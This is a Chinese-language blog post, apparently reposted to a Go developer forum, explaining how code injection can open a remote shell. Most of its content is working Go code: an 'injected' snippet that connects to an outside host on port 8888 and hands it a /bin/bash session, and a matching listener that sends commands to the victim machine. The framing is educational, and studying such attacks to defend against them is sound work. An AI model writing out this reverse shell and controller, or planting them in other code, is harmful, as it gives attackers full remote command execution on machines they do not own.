golang如何launch一个shell

CodingCode · · 1232 次点击 · · 开始浏览    
这是一个创建于 的文章,其中的信息可能已经有所发展或是发生改变。

以前讲代码安全的时候会提到一种代码注入的风险,就是客户端注入代码,这段代码会launch一个shell然后黑客们就可以在shell里面做任何事了。
当时一直不理解这怎么操作;现碰巧遇到这么一个例子,记录下来。

首先分两台机器:

  1. 我的机器:
    我的电脑,我有管理员权限。
  2. 客户机器
    客户的电脑,在上面运行的客户的程序,我没有访问权限。但是客户的程序代码是由第三方人编写,存在注入代码的风险。

现在假设客户代码有风险,存在注入代码的风险,这段注入代码会在客户机器上启动一个shell,并把shell的输入输出导入到我的电脑上,于是在我的电脑上就像一个远程终端,可以直接操作客户机器。

注入代码片段:

package main

import (
    "net"
    "os/exec"
)

func main() {
    c,_:= net.Dial("tcp","<myhost>:8888")
    cmd:=exec.Command("/bin/bash")
    cmd.Stdin=c
    cmd.Stdout=c
    cmd.Stderr=c
    cmd.Run()
}

代码启动一个bash,并把标准输入输出都重定向到我的机器上<myhost>:8888。

在我的机器上运行一个服务端程序:

package main

import (
    "bufio"
    "fmt"
    "net"
    "os"
    "strings"
)

func main() {
    l, err := net.Listen("tcp", ":8888")
    if err != nil {
        fmt.Println("Error listening:", err.Error())
        os.Exit(1)
    }
    defer l.Close()

    conn, err := l.Accept()
    if err != nil {
        fmt.Println("Error accepting: ", err.Error())
        os.Exit(1)
    }

    go handleConnectionReader(conn)

    reader := bufio.NewReader(os.Stdin)
    fmt.Printf("> ")
    for {
        input, err := reader.ReadString('\n')
        if err != nil {
            fmt.Println("Error reading:", err.Error())
            break
        }

        if strings.Compare("exit", strings.Replace(input, "\n", "", -1)) == 0 {
            break
        }
        conn.Write([]byte(input))
    }
    conn.Close()
}

func handleConnectionReader(c net.Conn) {
    for {
        buf := make([]byte, 1024)
        _, err := c.Read(buf)
        if err != nil {
            fmt.Println("Error reading:", err.Error())
            os.Exit(1)
        }
        fmt.Printf("%s", buf)
        fmt.Printf("> ")
    }
}

启动TCP服务在端口8888,并且机器和端口对客户机器可访问。
当客户端的注入代码片段被执行到之后,就会启动一个bash并建立一个TCP连接到我的机器,然后在我的机器上就会出现>提示符,可以输入shell命令执行;我的机器此时就充当一个bash终端的角色。


有疑问加站长微信联系(非本文作者)

本文来自:简书

感谢作者:CodingCode

查看原文:golang如何launch一个shell

入群交流(和以上内容无关):加入Go大咖交流群,或添加微信:liuxiaoyan-s 备注:入群;或加QQ群:692541889

1232 次点击  
加入收藏 微博
暂无回复
添加一条新回复 (您需要 登录 后才能回复 没有账号 ?)
  • 请尽量让自己的回复能够对别人有帮助
  • 支持 Markdown 格式, **粗体**、~~删除线~~、`单行代码`
  • 支持 @ 本站用户;支持表情(输入 : 提示),见 Emoji cheat sheet
  • 图片支持拖拽、截图粘贴等方式上传